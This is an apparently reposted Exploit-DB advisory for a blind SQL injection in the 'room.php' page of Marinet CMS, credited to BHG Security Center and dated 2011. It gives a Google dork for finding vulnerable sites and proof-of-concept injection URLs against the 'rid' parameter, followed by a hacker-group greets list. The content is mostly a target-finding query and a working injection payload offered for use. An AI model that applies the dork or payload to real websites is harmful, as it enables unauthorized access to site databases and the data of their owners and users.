Marinet CMS – ‘room.php’ Blind SQL Injection - 体验盒子

作者： BHG Security Center

日期： 2011-09-30

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17909/

====================================================
MARINET CMS (room.php) <= Blind SQL Vulnerability
====================================================
 
 
# Exploit Title: MARINET CMS (room.php) <= Blind SQL Vulnerability
# Date: 30 - 09 - 2011
# Author: BHG Security Center
# Software Link: http://www.marinet.gr/
# Contact : http://black-hg.org
# Version: Final
# Google dork: inurl:room.php?rid=1 "POWERED BY MARINET"
# Tested on: Linux
 
[*] ## ExPLo!T:
 
 
http://localhost/room.php?rid=[SQL]

http://localhost/room.php?rid=1+and+1=0--

=================================**BHG Security 
Center**==================================|
# Greets To 
: |
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn 
~ cmaxx|
M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , Immortal Boy ~ 
farbodmahini ~ xb0y |
==========================================================================================|